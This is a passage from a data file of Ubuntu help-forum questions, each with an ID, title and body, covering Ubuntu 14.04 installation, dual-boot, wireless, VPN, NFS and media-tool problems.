ip=192.168.1.149 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:79 ioport:2000 ( size=256 ) memory : f2800000-f2803fff warning : output may be incomplete or inaccurate , you should run this program as super-user . please help , i am trying to get my wife on board with linux ( she is even less tech-savvy than i am ) and slow internet is n't helping the cause !
485249	ubuntu live not starting	all i am trying to do is recover some files from a hd on an acer 135t desktop . windows will not boot . so i was looking around and found ubuntu and it sounded perfect . so i downloaded ubuntu 14.04 to boot on dvd . the boot dvd works on 2 other dell computers . but when in try to run ubuntu live on the acer , it looks like it is loading and takes a couple of minutes , while displaying ubuntu 14.04 on the screen then the message appears `` starting cups print spooling ... ... '' . the next thing that happens is that the a message appears on the screen `` pc entering power save mode '' and shuts down . caput . nothing more . the same thing happens whether i try to run ubuntu or lubunto 14.04 live . i also made a mini-ubuntu dvd , but it only gives me the option to install ubuntu , so that i did . and without installing any additional packages , i am able to log in to the $ prompt . i was interested in installing a graphical desktop and tried two different ones at different time and when i reboot , the computer goes into the sleep mode . so here i am stuck , i have probably destroyed some the data on my disk , but i still have a couple of windows partitions , so maybe something is there . if the shutdown has to do with the graphics , i have no idea what is installed . i checked in computer setup , but ca n't determine as it is on board . the is at least 640 mb ram and maybe more , not sure how to read the sticks , but each says 512 and i think there must be some on board because setup refers to a total of 960mb.its a 200mhz micro , so maybe this is a problem . any suggestions on what i can do to get to my data ? i am not that handy with unix ? can i get to the windows partitions to look at files and move to a usb drive ? any help is appreciated .
485251	update from 13.10 to 14.04	i 'm trying to update from 13.10 to 14.04 but whenever i try to update from terminal by using sudo apt-get update i get the error : w : failed to fetch cdrom : //ubuntu 13.10 saucy salamander - release amd64 ( 20131016.1 ) /dists/saucy/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 saucy salamander - release amd64 ( 20131016.1 ) /dists/saucy/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 saucy salamander - release amd64 ( 20131016.1 ) /dists/saucy/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 saucy salamander - release amd64 ( 20131016.1 ) /dists/saucy/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead .
485252	does ubuntu have any issues with amd periferals ?	i 'm trying to run ubuntu on a gateway pc and , so far , i ca n't get the standalone disk to operate . i keep getting a message reading : `` your screen , graphics card , and input settings could not be detected correctly . you will need to configure these yourself . '' it then displays a menu with four options . when i choose one of the fist two options ( attempting to run the machine with reduced graphics or repair the problem ) , it displays a list of diagnostic results all of which read `` ok '' with the exception of `` restore sound card state '' which reads `` fail '' . the hardware profile indicates that both the graphics and audio boards are of amd manufacture . does anyone have any ideas of where to start with this ? i ca n't even get to a command prompt .
485257	need help removing wlan 'white list ' on compaq qc-60-419wm	okay i have bios that are blocking my wlan card on boot up , i have the original phoenix bios file , along with modified bios that are supposed to remove the wireless lan 'white list . ' the biggest problem is the only way i see to install is run windows to do it . the biggest problem is i do n't have windows on this computer . any advice ? this is a link to where i got both drivers . here
485258	how to remove read-only system files ( seems to virus problem ) ?	i have a pendrive wich are full of virus , these vă­rus are .js files , using linux , i can open the pendrive and see in which folders they are . but when i try to remove by pressing delete button or via sudo rm filename.extension it gives me an error , they say that : can not remove 'file.lnk ' : read-only file system the entire pendrive 's files are like these , i ca n't even format it with gpard that it also gives me an error message . i have like 3 or 4 folders containing these .js files . i can even open it with gedit but ca n't edit it 's content . these folders name are like c4 , d8d8d , cfc4c and the files are like gd586d.js , id9d9.js . how may i work around this ? clean this pendrive from these files by terminal or whatever ...
485260	black screen with blinking line	i 've searched this website , but i could n't find any answers that helped . maybe someone can try and explain things as simply as possible . sorry if i 'm not descriptive enough . but iâm not tech savvy . i did n't use a cd or a usb to install ubuntu . i just downloaded it and booted it up . when i was trying to install it , i created a new partition ( or something like that ) and clicked install . it gave me a message that said changes made to sda/1/ ( or something like that ) wo n't take place until i restarted the computer , so i restarted the computer , but now the screen stays black with a blinking underline character . i ca n't do anything or type anything . i tried to enter into a console so that i could type commands there , but nothing happens when i press ctrl+alt+f1 . what should i do ? can anyone help ? the graphics card is nvidia
485261	change boot order using efibootmgr	i recently installed ubuntu 14.04 ( first time linux user ) on my hp envy and have been trying to get the dual boot to work . i 've looked around and have tried running the boot repair ( here are the results ) but it still says the boot files are far from the start of the disk . i also ran the efibootmgr and have this : bootcurrent : 0000 timeout : 0 seconds bootorder : 3002,3000,3001,2001,2002,2003 boot0000* ubuntu hd ( 2 , c8800,82000 , a0d91f49-899b-46ac-8863-35f2d16774c4 ) file ( \efi\ubuntu\shimx64.efi ) boot0001* ubuntu hd ( 2 , c8800,82000 , a0d91f49-899b-46ac-8863-35f2d16774c4 ) file ( \efi\ubuntu\grubx64.efi ) rc boot0002* windows boot manager hd ( 2 , c8800,82000 , a0d91f49-899b-46ac-8863-35f2d16774c4 ) file ( \efi\microsoft\boot\bootmgfw.efi ) rc boot2001* usb drive ( uefi ) rc boot2002* internal cd/dvd rom drive ( uefi ) rc boot3000* internal hard disk or solid state disk rc boot3001* internal hard disk or solid state disk rc boot3002* internal hard disk or solid state disk rc boot3003* internal hard disk or solid state disk rc boot3004* internal hard disk or solid state disk rc boot3005* internal hard disk or solid state disk rc boot3006* internal hard disk or solid state disk rc boot3007* internal hard disk or solid state disk rc boot3008* internal hard disk or solid state disk rc boot3009* internal hard disk or solid state disk rc boot300a* internal hard disk or solid state disk rc which by the looks of it looks very messy and is not putting the efi files at the start . any suggestions as to how i should go about this issue ? thanks .
485262	14.04 installer , how to fix screen before booting it ?	so , the installer boots up , until i can hear that ubuntu drum sound , so it is working , but the screen is completely messed , the mouse wont show up , and only several vertical colored lines cover up the screen and they are static ... i think i must , in someway , force the screen to some setup right ?
485266	lubuntu : my screen needs a serious reset	i am building my own custom lubuntu ( based on lubuntu-14.04-desktop-i386.iso ) system image under vmware 8 . it works fine , except the system a nasty tendency of screwing up the display if i relogin during the same vm session . that is , when i login initially as everybody ( normal user ) , the display is perfect . when i logout and immediately relogin as theadmin , this is the result : the order of who logs in first is immaterial . i 'm not a newbie and have been successfully using this setup ( i.e . windows+vmware ) for other linux remastering efforts ( slax/zenwalk/pclinuxos ) for many years , but i need a little help with this one . essentially is there a way to force the video driver to reset itself without restarting linux itself ? the actual vmware display driver ( according to synaptic ) has n't changed , so i do n't think that an upgrade caused this either . googling returns lots of search results about installation errors+uninstalling display drivers , but nothing close to what i 'm experiencing . thanx .
485267	is there a way to disable portrait/login picture display in the xubuntu login ?	i recently upgraded a machine from xubuntu 12.10 and now the login screen has a blank silhouette that looks like the facebook empty profile picture . how do i disable this and get back to just username and password fields at login ? ( i like the rest of lightdm so i would like to stick with it . )
485268	installation problem : dual-boot with windows 7 on vaio z	i 'm trying to install 64-bit ubuntu 14.04 lts on my sony vaio z ( specs below ) , which has windows 7 . i boot my computer with the drive in and click install ubuntu 14.04 lts on the ubuntu desktop . the welcome page asks for a language . once the welcome page had a sentence of text , but most times i try it does not . i click continue and i do not connect to wireless then i click continue . on the preparing to install ubuntu page i click continue . on the installation type page it says `` this computer currently has multiple operating systems on it . what would you like to do ? '' the options are `` erase disk and install ubuntu '' and `` something else '' . the one time that the welcome page had a sentence of text the corresponding installation type page had another option that said something like `` install ubuntu alongside windows '' . but , as a said earlier , the page only loaded that way once and i ca n't reproduce the result . i have consulted other questions , but i do not know how i should partition my drive for the installation . additionally , i am confident that when i get past this step the problem i will have the same error that i had when i did the erase disk and install ( which erased the disk completely but was unable to install because of an error `` ? ? ? ? ? ? `` , so i had to reinstall windows ) my questions : how should i partition the drive since the install alongside windows option is n't appearing ? when i get to the `` install now '' stage , how can i address the error `` ? ? ? ? ? ? '' that comes up on the `` where are you '' page and persists ( even if i close it many times the computer begins thinking indefinitely with a moving ubuntu wheel as the cursor . further description : when i get to the screen asking `` where are you ? '' an error window titled `` ? ? ? ? ? ? '' comes up . i click ok and move on to enter a computer name and username and go through the ubuntu features slide still under the `` install '' window . the slides explain some features of ubuntu . the end slide is titled `` any questions ? '' at this point my cursor is an animated circular 'thinking type ' cursor . the screen stays here indefinitely . this is what i have done : created fresh copy of usb drive created fresh copy of cd downloaded fresh copy of amd64 .iso checked .iso with md5sum ( correct hash ) checked hard disk ( healthy and running windows ) tried the install as an initial option as well as clicking `` try ubuntu '' then using the desktop install icon tried to create usb with unetbootin but no luck because unetbootin does not recognize my 16gb flash drive for unknown reason sony vaio z series vpcz2190x : series 8 gb ram , intel i7 2.70ghz x 4 processor
485270	connecting to vpn network in ubuntu	i am trying to connect to a vpn from a linux pc . now , this works on a windows pc , where we use cisco anyconnect as the vpn client we use rsa securid software tokens the token is a soft token , using a sdtid file so , this works on my windows pc , using windows applications & instructions . i would like to also connect to this vpn from a laptop i have running ubuntu i 've installed openconnect , and i 've also installed stoken to handle the rsa passcodes for openconnect . however , when i attempt to import my sdtid file into stoken , i get this error me @ animal : ~/cat/vpn $ stoken import -- file filename.sdtid error : no valid token in file 'filename.sdtid ' : general failure i 've googled around and also tried something called tokenconverter ( a java application ) to convert data from the sdtid to a code that can be entered into stoken , but it hangs when i try to run it . my sdtid file looks to be an xml file , not a binary file . i 'm using version 0.2-1 of stoken ( as that 's what the ubuntu repositories installed ) , but it looks like there are later versions downloadable . has anyone got this setup to work from ubuntu ? surely i just must be missing a step . thanks for any help . here 's what i see when i add a connection : there 's no option to use a soft token .
485271	how to add georeferencing to a jpeg file	first of all , i 'm completely new to ubuntu . my garmin handheld gps is recognized by ubuntu and i am able to access the file . i wish to add a jpeg map to the device and i 'm running into problems . i downloaded qlandkartegt and when i try to upload my map it keeps giving me the same error message which says `` this map does n't contain georeferences '' . i have the coordinates for the map , but i have no clue of how to add them to the jpeg file . and if i some how find out how to add the coordinates the stupid jpeg wo n't even copy and paste to the maps file ... ... i 'm going crazy . i may just give up on ubuntu all together ... ahhhhhh
485272	which version ( 32b or 64b ) is good for my system configuration ?	do i download the 32 bit or 64 bit version ? it has intel core2 cpu 6600 @ 2.40 ghz & 2.00 gb ram . it is running xp 32 bit . so will 64 bit version of ubuntu run on this machine ? thanks ,
485273	how can i alternate between two kiosk-mode appplications ?	i currently have a single-user system that autoloads into x and starts xbmc via a super-simple upstart job that runs : su -c `` startx /etc/x11/xsession /usr/bin/xbmc-standalone -- -bs '' oli super-simple and it works , double-rock-solid ... no desktop getting in the way . no window manager to slow down performance . and it bounces back when xbmc crashes ( once a day ) . it 's fantastic if all you want to do is use xbmc . but now i 'd like to install steam to play games . this raises some problems : steam and xbmc are going to fight over screen time ( there 's no window manager , remember ) and audio devices . we need to close xbmc before starting steam but without killing x . note how xbmc is currently launched . how do i do that ? it 'd also be really grand if i could trigger the xbmcâsteam switchover from my wireless xbox controller . it 's hooked in with xboxdrv which has an exec option : xboxdrv -- ui-buttonmap xboxbtn=exec : /home/oli/bin/switch.sh so assuming # 1 can be scripted , i can hook in . the second half of # 1 . when steam exists i need xbmc to come back up . if whatever 's currently running crashes , it needs to be the thing that loads back up . so it seems my biggest problem is monitoring an application . if it exits gracefully ( code 0 , eg i 've asked it to exit , or i 've called a script that asked it to exit ) , it should load the other application and monitor it . if it crashed ( not code-zero ) , it should run the same application and monitor it . make sense ? but how ? this all sort of feels like something upstart would be great for except both are x applications running at user-level . i 'm on 14.04 so if it has come far enough , that might be an option . there may also be a way of doing this that 's special to xbmc and/or steam . i 'm open to suggestions .
485278	windows 8.1 not appearing in grub2 after installing ubuntu 14.04	i have hp notebook which came with freedos ( mbr partitioned with two primary partitions ) . i have installed windows 8.1 in legacy mode by creating another primary partition . yes , in legacy mode though my notebook supports efi . then installed ubuntu 14.04 in 75gb unallocated free space . after installation , grub2 is showing dos and ubuntu options but not windows 8.1 option . then i have installed bootrepair and ran recommended repair as suggested in forum ( http : //paste.ubuntu.com/7658680 ) , but still it is not recognizing windows . after googling i ran fixmbr from command prompt in windows live session for fixing windows issue . then , the system was directly booting to windows ( all my files were there ) . then , through ubuntu live lession i again ran bootrepair . but , the same issue repeated . grub2 is only showing dos and ubuntu options but not windows 8.1 option . so , if i fix windows issue , ubuntu is not booting . if i fix ubuntu issue , windows is not booting . i am only able to run one os at a time . but , i need both . please help me out.. thanks in advance..
485280	stand alone flash player	i 'm running ubuntu 14.04 x64 desktop lts and have downloaded the adobe stand alone player . when i try to run it i get the error : - ./flashplayer ./flashplayer : error while loading shared libraries : libgthread-2.0.so.0 : can not open shared object file : no such file or directory as far as i can tell i have the apropriate libraries installed but i 'm guessing its looking for the x86 library but i do n't know how to force install it . how do i do this ?
485287	ubuntu 14.04 hangs with log out	my ubuntu 14.04 has started hanging when i try to log out . i takes at least 3 minutes before it finally will log out . then the user name ( i only have one ) will be blank whereas before it was filled in , then it gets bucky about accepting my password . i have to enter it several times but in the end it will accept it . i have reviewed software i have installed ( which is n't much ) and also programs set to autostart . nothing has helped . i have done some research on the internet but i have not found anything quite like this problem . this does n't really pose a problem for me but i am curious as to why this has changed . i do n't know if this is related but it started about the same time and maybe after an update . when i would log out before i had this problem i would just be asked for my password never the user name . but now it shows the user name and i have to hit enter or spacebar to move on to where it asks for my password . also during boot up it shows the user name when it asks for the password . has anyone encounter this and solved it ?
485290	how can i switch a folder to read-only mode so i can backup , but letting the server to write transparently to a journal file	i have a very large server ( minecraft ) using tens of gigabytes of files . every two days , i make a backup , but since the server is so big , i have to shut it down for 45 minutes until the backup is done . if i backup while the server is running , the backup folder gets corrupted because not all files were backed up at the same time and there 's duplicate data , missing data and other problems . chmodding the server folder recursively to 440 ( read-only ) makes the server spam thousands of errors , and sometimes crashes it or corrupts data . what i am trying to do is to switch the server to read-only mode , but to allow it to write to temporary `` journal '' files which will be written to the real files once the backup is finished . is this possible at all ? if yes , what tool should i use to do this ? i was thinking something such switching the server folder to a soft link to a folder or partition that simulates this .
485291	uninstall ubuntu 14.04 x64 that runs with win8 and ubuntux86	i recently installed ubuntu 14.04 64 bit on my system that already have windows 8 and ubuntu 14.04 32 bit installed . i want to uninstall the 64 bit version now . how can i do that ?
485292	belkin wireless adapter card f9l1101v2 not working on ubuntu 14.04	so i just installed ubuntu 14.04 lts on my desktop . however , the system does not have the driver for my wireless card ( belkin f9l1101v2 ) . does anyone have similiar problem ? any help is appreciated . to follow up with wildman 's comment . here is the result i got after running the script : thank you ! # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux dj-ubuntu 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 06:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : asustek computer inc. p8p67 and other motherboards [ 1043:8432 ] kernel driver in use : r8169 # # # # # lsusb # # # # # bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 0930:6544 toshiba corp. kingston datatraveler 2.0 stick ( 2gb ) bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 04f2:0116 chicony electronics co. , ltd ku-2971/ku-0325 keyboard bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 050d:110a belkin components bus 001 device 003 : id 046d : c52b logitech , inc. unifying receiver bus 001 device 002 : id 0424:2514 standard microsystems corp. usb 2.0 hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 6 , 20 ) ( 2457 - 2482 @ 40 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 6 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 160 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 5250 - 5330 @ 160 ) , ( 6 , 20 ) , dfs , passive-scan , no-ibss ( 5490 - 5730 @ 160 ) , ( 6 , 20 ) , dfs , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface # # # # # resolv.conf # # # # # # # # # # nm-tool # # # # # networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # no way to aquire root rights found . # # # # # iwlist channel # # # # # # # # # # lsmod # # # # # # # # # # modinfo # # # # # # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x10ec:0x8168 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # # # # # dmesg # # # # # # # # # # # # # # # wireless info end # # # # # # # # #
485298	openvpn set up with rapidssl certificate	i am trying to set up openvpn on my web server using a certificate i purchased through rapidssl . all i have done so far is follow the quick start guide found here and did some basic set up through the web interface . rapidssl had me put a password on my key file and now when i try and update the ca files on openvpn it gives me this error : '' [ ( 'pem routines ' , 'pem_def_callback ' , 'problems getting password ' ) , ( 'pem routines ' , 'pem_do_header ' , 'bad password read ' ) ] ( openssl.crypto.error ) '' and this one : '' local variable 'priv_key ' referenced before assignment ( exceptions.unboundlocalerror ) '' . obviously i need to give openvpn the password to the key file somehow but i just ca n't seem to figure it out . any ideas ? i am sort of stuck at this point . so far i have only used the openvpn web interface . my website works fine otherwise . i am running apache 2.4.7 and ubuntu 14.04 on the server .
485299	doubt : about dual boot ( 14.04 with windows 7 )	i tried to install dualboot windows 7 and ubuntu 14.04 . the ubuntu installation did n't find the windows partition . i installed windows on the complete hdd ( one partition ) , then i tried with one partition for windows and no other partition , but still ubuntu does n't find windows . should i install ubuntu first ?
485302	doubt : about dual boot ( in partition )	i have a computer on which all the hard disks are partitioned and are already used by me . since the newer versions of ubuntu require a partiton for dualbooting i was thinking of getting another extra hard disk and installing ubuntu on that particular disk . does this seem like the correct thing to do or am i making a mistake somewhere ? i would like to know the safest way to do it without affecting anything . some advice would be helpful since i see a lot of threads where people try to install ubuntu and the ubuntu boots but the original os does not .
485303	how do i stop ubuntu from intercepting the super key when running vmware ?	i am running vmware with ubuntu 14.04 . the host operating system is ubuntu 14.04 , and the guest is windows 8.1 pro . when i briefly press the super key from within vmware , ubuntu displays the keyboard shortcut overlay , and it does not go away . how do i stop this from happening ?
485304	how to install tevii s662 driver on ubuntu 14.04 ?	i have tevii s662 driver ( tevii_product_20140130_media_build_b51.tar.bz2.rar ) and my system is ubuntu 14.04 .i want to know how to install this drive on my system
485305	setup nfs on a folder that has symlinks to other drives/partition	i build a new ubuntu home server , previously i used samba but research indicates nfs is faster . [ this replaces my old arch machine ] here is the scenario : i have 4-5 hdd attached and mounted on /media using fstab . [ i used /dev/sda1 format instead of uuid , please advise on good practice ] i want to access these ntfs partition via nfs . now if i share the /media directory , i can see the folders of the mounted partition and when i enter i can not see the contents . currently i 'm sharing /media and all the sub folders aka the mounted partition . this helps me achieve to only auto mount one share on mac and access all others , but on my xbmc machines nfs server shows all 11 shares , 10 partition + one /media . i would love for my xbmc to access as a proper tree and me only having to share /media/ is there a way to achieve this without sharing each partition , i have around 10 . a symlink or config maybe ?
485306	how to uninstall ubuntu that 's triple-boot with win8 and another ubuntu version	i have windows 8.1 , ubuntu x64 and ubuntu x86 installed on my pc . on boot , the main selection is ubuntu x64 i want to uninstall ubuntu x64 now and change the boot menu selection to ubuntu x86 . ofcourse , still dual-boot with windows 8 . can anyone tell me how to do that ? or how to move the bootloader to a different partition ?
485308	how to install ubuntu 14.04 using burnt cd on mid-2012 macbook pro ( 13 '' ) ?	i have gotten as far as selecting the formatted partition . then when i click install it says that is has failed . i do n't know what i am doing wrong or where to go from here . i would greatly appreciate any help .
485309	asterisk crm integration	while there are some options , what would be the simplest crm which would enable `` click to dial '' or similar functionality ? something like : phone overview renders a callto : // url to trigger voip applications . phone the phone field simply invokes the callto : // url references that could trigger skype or other voip applications installed on the userâs system . it is rendered for detail views only . as per : http : //support.sugarcrm.com/02_documentation/04_sugar_developer/sugar_developer_guide_6.7/03_module_framework/02_metadata/01_sugarfields/01_widgets/phone/ i would like to just use the community edition .
485311	`` an error was found . do you want to resend it ? ''	when i logged in to my machine running kubuntu 14.04 this evening , the following message popped up : if i were running windows , i would immediately shut down the system , change my passwords , and get my backups ready . but since this is linux , it 's probably not a virus , so i checked it out . apparently , the process running the window is akonadi_sendlater_agent . what error happened that i or any developer would care about ? was anything sent and can i see the error ?
485313	installing on a satellite c8855d-s5340 with windows 8	i do n't know if it just a complete lack of experience , but my old toshiba satellite c8855d s5340 refuses to install or boot from any boot disk . i currently have windows 8 . i have used both the 32bit and 64bit versions and from both cd ( or rather dvd-w ) and a usb card . regarding the usb , i used the installer that ubuntu recommends . i get as far as the restart , but then it just reboots to windows . i go into the bios and set it to boot the disk drive first , and i get a ( sometimes ) a terminal that asks me what i want to do with ubuntu ( dual boot or replace ) , i select replace , and then i get a blank screen that remains empty indeterminably ( i shut it off and try again after ten min or so ) . i do n't know what my laptop is doing , and i 'm getting rather irritated with it ( although i do recognize my operator error ) . what am i doing wrong ?
485322	ca n't login to my ubuntu 14.04	all i did today was lock ubuntu while i was away , i came back about an hour later , and logged in , and it puts me back into the login screen . i thought that it was just a little bug that needed ubuntu to restart , so i did it . i logged in , same thing . now the only way to log in is by the guest account . i have tried all the other suggestions and they have n't worked . how can i fix this ?
485323	game , `` facade '' , has no sounds in game and is slow	i successfully installed facade and loaded it with wine . the sound works in the intro and menu screens , but when the main game loads , there is no sound and the game gets extremely slow . i know my computer can handle a lot more than the game . any suggestions ? thank you !
485326	how to stop update for mencoder & mplayer in my system ( 14.04 ) ?	i have 14.04 installed but i have problem with mencoder & mplayer which always want to update to version from 2012 but i compiled mencoder & mplayer from sources so i get newest version . how exclude mencoder & mplayer from updating ? ?
485332	avconv incorrect length when splitting video	avconv used to work fine for me in 13.10 , but now it does n't . i 'm using it in the same way as before , for example : avconv -ss 1971 -t 2216 -i x.mp4 -vcodec copy -acodec copy -metadata track= '' 7 '' `` d32.mp4 '' terminal output : avconv version 9.13-6:9.13-0ubuntu0.14.04.1 , copyright ( c ) 2000-2014 the libav developers built on may 9 2014 13:34:03 with gcc 4.8 ( ubuntu 4.8.2-19ubuntu1 ) input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from 'x.mp4 ' : metadata : major_brand : isom minor_version : 512 compatible_brands : isomiso2avc1mp41 encoder : lavf55.12.100 duration : 01:06:14.76 , start : 0.000000 , bitrate : 848 kb/s stream # 0.0 ( und ) : video : h264 ( main ) , yuv420p , 854x480 , 716 kb/s , 25 fps , 25 tbr , 90k tbn , 50 tbc stream # 0.1 ( und ) : audio : aac , 44100 hz , stereo , fltp , 125 kb/s output # 0 , mp4 , to 'd32.mp4 ' : metadata : major_brand : isom minor_version : 512 compatible_brands : isomiso2avc1mp41 track : 7 encoder : lavf54.20.4 stream # 0.0 ( und ) : video : libx264 , yuv420p , 854x480 , q=2-31 , 716 kb/s , 90k tbn , 90k tbc stream # 0.1 ( und ) : audio : aac , 44100 hz , stereo , 125 kb/s stream mapping : stream # 0:0 - > # 0:0 ( copy ) stream # 0:1 - > # 0:1 ( copy ) press ctrl-c to stop encoding frame=50092 fps=6618 q=-1.0 lsize= 197157kb time=2003.60 bitrate= 806.1kbits/s video:165125kb audio:30720kb global headers:0kb muxing overhead 0.670179 % the length of the output should be 4 minutes and 5 seconds , but it is over 30 minutes . does any one know what is going on or have a suggestion ?
485333	unblock dell-wifi soft block	rfkill list shows : 0 : phy0 wireless lan soft blocked : no hard blocked : yes 1 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes i already ran rfkill unblock all and yet still get the same results . i certainly do n't see any switch for wireless . the inspiron 1420 laptop was purchased a matter of weeks ago from freegeek , and they generally test the hardware . while it could be a hardware problem , could this also be a software problem ? certainly the second soft block should be unblocked , yes ?
485336	how to install wlan driver ?	i have the drivers for a broadcom wlan card , i just do n't know how to do any of it . i will post a link to he read me file from broadcom to see if anybody knows how to help . here is a link to the read me i also have the tar.gz file on the desktop as a simple address . edit : i have tried this : sudo apt-get install bcmwl-kernel-source and it says my drivers are up to date but i still have no wireless
485337	permissions for sugarcrm in /var/www/html/	i downloaded sugarcrm community edition , unzipped and moved it , with sudo , to /var/www/html/ but keep getting errors when navigating to http : //dur.bounceme.net/sugar or localhost/sugar ( i renamed the directory sugar from sugarce-full-6.5.16 ) . system check acceptance sugarcrm help errors have been detected during compatibility check . in order for your sugarcrm installation to function properly , please take the proper steps to address the issues listed below and either press the recheck button , or try installing again . component status writable sugarcrm configuration file ( config.php ) the config file exists but is not writeable . please take the necessary steps to make the file writeable . depending on your operating system , this might require you to change the permissions by running chmod 766 , or to right click on the filename to access the properties and uncheck the read only option . the config override file exists but is not writeable . please take the necessary steps to make the file writeable . depending on your operating system , this might require you to change the permissions by running chmod 766 , or to right click on the filename to access the properties and uncheck the read only option . writeable custom directory the custom directory exists but is not writeable . you may have to change permissions on it ( chmod 766 ) or right click on it and uncheck the read only option , depending on your operating system . please take the needed steps to make the file writeable . writable cache sub-directories the files or directories listed below are not writeable or are missing and can not be created . depending on your operating system , correcting this may require you to change permissions on the files or parent directory ( chmod 755 ) , or to right click on the parent directory and uncheck the 'read only ' option and apply it to all subfolders . please fix the following files or directories before proceeding : /var/www/html/sugar/cache/ /var/www/html/sugar/cache/images /var/www/html/sugar/cache/layout /var/www/html/sugar/cache/pdf /var/www/html/sugar/cache/xml writable modules sub-directories and files warning : not writable please fix the following module directories and the files under them before proceeding : /modules writable upload directory warning : not writable location of your php configuration file ( php.ini ) : /etc/php5/apache2/php.ini i 'm going through the permissions , but have already tried to fix the files and directories as per the message .
485340	ap hotspot connected but net is not shared	i set up a hotspot using ap hotspot , and my android phone is connected to the hotspot , but i am unable to access the internet on the phone , though it shows connected . i use ubuntu 14.04
485344	skype and steam will not run at the same time	every time i launch steam , it crashes skype . it claims unable to sign in due to a disk i/o error , try restarting skype to fix this . i have restarted skype , and that gave me no results . this problem happened when i was using ubuntu 13 , and went away for a while when i updated to 14.04 . it 's back and i have no idea how to fix it .
485347	how to create plugin for olsrd , i am running olsrd in ubuntu	how to create plugin for olsrd , i am running olsrd in ubuntu . ps : i installed olsrd from synaptic manager .
485349	wireless is not working in my system ?	i have a hp pavilion 15-e057ej laptop . in ubuntu 12.04.04 64-bit the wireless network worked fine . after i install fresh 14.04 64-bit , wireless is n't working - it 's not enable . what can i do ? here 's some more information : at both versions of ubuntu : 12.04.04 , 14.04 the light of the wifi button is orange , mean it close . at 12.04.04 the wireless working fine and enable . at 14.04 it not working and the wifi is not enable . at both version of ubuntu 12.04.04 and 14.04 the button to switch the wifi on - turn the light to blue , is not doing anything . rfkill list sudo lshw -class network sudo lspci -nn cat /var/log/dmesg cat /var/log/udev tail -f /var/log/kern.log script - wireless-info.txt use script from this question :
485352	camparison of official derivatives	i want to get comparison of ubuntu official derivatives like : ubuntu ( default-unity ) ubuntu gnome xubuntu kubuntu my question is purposed to real ( fact ) comparison , not to get opinions .
485353	ubuntu could not detect eth0 network	after installing new version of this distro , that can not detect eth0 automatically command inxi -snxz result : network : card-1 : broadcom netxtreme bcm57786 gigabit ethernet pcie bus-id : 01:00.0 card-2 : qualcomm atheros qca9565 / ar9565 wireless network adapter driver : ath9k bus-id : 02:00.0
